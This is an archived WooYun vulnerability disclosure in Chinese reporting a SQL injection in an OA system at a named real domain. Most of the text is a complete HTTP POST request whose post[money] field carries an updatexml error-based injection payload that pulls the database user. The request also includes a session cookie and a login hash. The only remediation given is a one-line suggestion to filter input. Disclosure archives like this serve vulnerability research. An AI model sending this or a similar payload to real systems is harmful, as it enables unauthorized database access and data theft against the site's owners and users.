乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-30: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-06-14: 厂商已经主动忽略漏洞,细节向公众公开
依旧是SQL脱裤
漏洞利用: POST 提交 一些数据可注入===================================POST URL : http://oa.xun-ao.com/admin/project_money/add.post.php字段 post[money] 存在注入===================================模拟HTTP请求即可完整的HTTP:
POST http://oa.xun-ao.com/admin/project_money/add.post.php HTTP/1.1Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*Referer: http://oa.xun-ao.com/admin/project_money/add_money.php?id=1Accept-Language: zh-CNUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Content-Type: multipart/form-data; boundary=---------------------------7de31f355b0368UA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveContent-Length: 375Host: oa.xun-ao.comPragma: no-cacheCookie: PHPSESSID=b37ft762aldqvs1qceas4pub96; loginpass=faa87452e3adea3d7a8c5bd4b1882c44-----------------------------7de31f355b0368Content-Disposition: form-data; name="post[create_time]"2014-04-22-----------------------------7de31f355b0368Content-Disposition: form-data; name="post[money]"11 and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))-----------------------------7de31f355b0368Content-Disposition: form-data; name="post[project_id]"1-----------------------------7de31f355b0368--
过滤嘛
未能联系到厂商或者厂商积极拒绝